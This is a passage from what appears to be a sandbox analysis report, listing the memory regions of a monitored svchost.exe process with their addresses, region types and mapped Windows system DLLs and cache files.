0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 494 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 495 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 496 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 497 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 498 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 499 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 500 start_va = 0x520000 end_va = 0x521fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 501 start_va = 0x530000 end_va = 0x530fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 502 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 503 start_va = 0x560000 end_va = 0x566fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 504 start_va = 0x580000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 505 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 506 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 507 start_va = 0x660000 end_va = 0x666fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 508 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 509 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 510 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 511 start_va = 0x6b0000 end_va = 0x6b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 512 start_va = 0x6c0000 end_va = 0x6c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 513 start_va = 0x6d0000 end_va = 0x6d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 514 start_va = 0x700000 end_va = 0x706fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 515 start_va = 0x710000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 516 start_va = 0x7d0000 end_va = 0x7d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 517 start_va = 0x7e0000 end_va = 0x7e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 518 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 519 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 520 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 521 start_va = 0xc20000 end_va = 0x101afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 522 start_va = 0x1020000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 523 start_va = 0x10a0000 end_va = 0x10e4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 524 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 525 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 526 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 527 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 528 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 529 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 530 start_va = 0x1700000 end_va = 0x174efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001700000" filename = "" Region: id = 531 start_va = 0x17e0000 end_va = 0x17e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 532 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 533 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 534 start_va = 0x1a00000 end_va = 0x1d36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 535 start_va = 0x1d40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 536 start_va = 0x1e40000 end_va = 0x1f1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 537 start_va = 0x1f40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 538 start_va = 0x2040000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 539 start_va = 0x2140000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 540 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 541 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 542 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 543 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 544 start_va = 0x2600000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 545 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 546 start_va = 0x2780000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 547 start_va = 0x2880000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 548 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 549 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 550 start_va = 0x2b00000 end_va = 0x2b8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 551 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 552 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 553 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 554 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f00000" filename = "" Region: id = 555 start_va = 0x3300000 end_va = 0x337ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 556 start_va = 0x3380000 end_va = 0x347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 557 start_va = 0x34c0000 end_va = 0x34c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 558 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 559 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 560 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 561 start_va = 0x3800000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 562 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 563 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 564 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 565 start_va = 0x3c00000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 566 start_va = 0x3d00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 567 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 568 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 569 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 570 start_va = 0x4100000 end_va = 0x417ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 571 start_va = 0x4180000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 572 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 573 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 574 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 575 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 576 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 577 start_va = 0x4800000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 578 start_va = 0x48d0000 end_va = 0x48d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 579 start_va = 0x48e0000 end_va = 0x48e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048e0000" filename = "" Region: id = 580 start_va = 0x48f0000 end_va = 0x49effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 581 start_va = 0x49f0000 end_va = 0x49f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 582 start_va = 0x4b00000 end_va = 0x4b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 583 start_va = 0x4bd0000 end_va = 0x4bd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 584 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 585 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 586 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 587 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 588 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 589 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 590 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 591 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 592 start_va = 0x5400000 end_va = 0x547ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 593 start_va = 0x54f0000 end_va = 0x55effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054f0000" filename = "" Region: id = 594 start_va = 0x55f0000 end_va = 0x55f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055f0000" filename = "" Region: id = 595 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 596 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 597 start_va = 0x5800000 end_va = 0x587ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 598 start_va = 0x5880000 end_va = 0x597ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005880000" filename = "" Region: id = 599 start_va = 0x5a00000 end_va = 0x5a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 600 start_va = 0x5b00000 end_va = 0x5b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 601 start_va = 0x5b80000 end_va = 0x5c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 602 start_va = 0x5c80000 end_va = 0x5d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Region: id = 603 start_va = 0x5e80000 end_va = 0x5f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 604 start_va = 0x5f80000 end_va = 0x607ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f80000" filename = "" Region: id = 605 start_va = 0x6080000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 606 start_va = 0x6180000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 607 start_va = 0x63c0000 end_va = 0x64bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063c0000" filename = "" Region: id = 608 start_va = 0x6560000 end_va = 0x6564fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 609 start_va = 0x6570000 end_va = 0x657ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 610 start_va = 0x6590000 end_va = 0x6596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006590000" filename = "" Region: id = 611 start_va = 0x65a0000 end_va = 0x669ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065a0000" filename = "" Region: id = 612 start_va = 0x66a0000 end_va = 0x66b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 613 start_va = 0x66c0000 end_va = 0x66d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 614 start_va = 0x66e0000 end_va = 0x66f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 615 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 616 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 617 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 618 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 619 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 620 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 621 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 622 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 623 start_va = 0x6fe0000 end_va = 0x6fe6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006fe0000" filename = "" Region: id = 624 start_va = 0x7100000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 625 start_va = 0x7200000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 626 start_va = 0x7300000 end_va = 0x7310fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 627 start_va = 0x7320000 end_va = 0x7330fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 628 start_va = 0x7340000 end_va = 0x7350fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 629 start_va = 0x7360000 end_va = 0x7370fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 630 start_va = 0x7380000 end_va = 0x73a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 631 start_va = 0x73b0000 end_va = 0x73e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 632 start_va = 0x73f0000 end_va = 0x7400fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 633 start_va = 0x7410000 end_va = 0x7420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 634 start_va = 0x7430000 end_va = 0x7460fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 635 start_va = 0x7470000 end_va = 0x74a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 636 start_va = 0x7500000 end_va = 0x75fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 637 start_va = 0x7600000 end_va = 0x76fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007600000" filename = "" Region: id = 638 start_va = 0x7700000 end_va = 0x77fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007700000" filename = "" Region: id = 639 start_va = 0x79a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079a0000" filename = "" Region: id = 640 start_va = 0x7b00000 end_va = 0x7bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b00000" filename = "" Region: id = 641 start_va = 0x7c00000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 642 start_va = 0x85a0000 end_va = 0x869ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085a0000" filename = "" Region: id = 643 start_va = 0x86a0000 end_va = 0x879ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086a0000" filename = "" Region: id = 644 start_va = 0x91a0000 end_va = 0x929ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000091a0000" filename = "" Region: id = 645 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 646 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 647 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 648 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 649 start_va = 0x7ff6bac60000 end_va = 0x7ff6bac6cfff monitored = 0 entry_point = 0x7ff6bac63980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 650 start_va = 0x7ffb0a430000 end_va = 0x7ffb0a446fff monitored = 0 entry_point = 0x7ffb0a437520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 651 start_va = 0x7ffb0a450000 end_va = 0x7ffb0a493fff monitored = 0 entry_point = 0x7ffb0a4783e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 652 start_va = 0x7ffb0a4c0000 end_va = 0x7ffb0a76ffff monitored = 0 entry_point = 0x7ffb0a4c1cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 653 start_va = 0x7ffb0ab00000 end_va = 0x7ffb0ab07fff monitored = 0 entry_point = 0x7ffb0ab013b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 654 start_va = 0x7ffb0c3a0000 end_va = 0x7ffb0c3b7fff monitored = 0 entry_point = 0x7ffb0c3ab850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 655 start_va = 0x7ffb0c3c0000 end_va = 0x7ffb0c41cfff monitored = 0 entry_point = 0x7ffb0c3ee510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 656 start_va = 0x7ffb0cd40000 end_va = 0x7ffb0cd7efff monitored = 0 entry_point = 0x7ffb0cd682d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 657 start_va = 0x7ffb0dc20000 end_va = 0x7ffb0dd2efff monitored = 0 entry_point = 0x7ffb0dc5c010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 658 start_va = 0x7ffb0dd40000 end_va = 0x7ffb0dd50fff monitored = 0 entry_point = 0x7ffb0dd428d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 659 start_va = 0x7ffb0dd60000 end_va = 0x7ffb0dd91fff monitored = 0 entry_point = 0x7ffb0dd6b0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 660 start_va = 0x7ffb0ded0000 end_va = 0x7ffb0dee7fff monitored = 0 entry_point = 0x7ffb0ded1b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 661 start_va = 0x7ffb0e1c0000 end_va = 0x7ffb0e1d1fff monitored = 0 entry_point = 0x7ffb0e1c1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 662 start_va = 0x7ffb0f0b0000 end_va = 0x7ffb0f116fff monitored = 0 entry_point = 0x7ffb0f0bb160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 663 start_va = 0x7ffb0f120000 end_va = 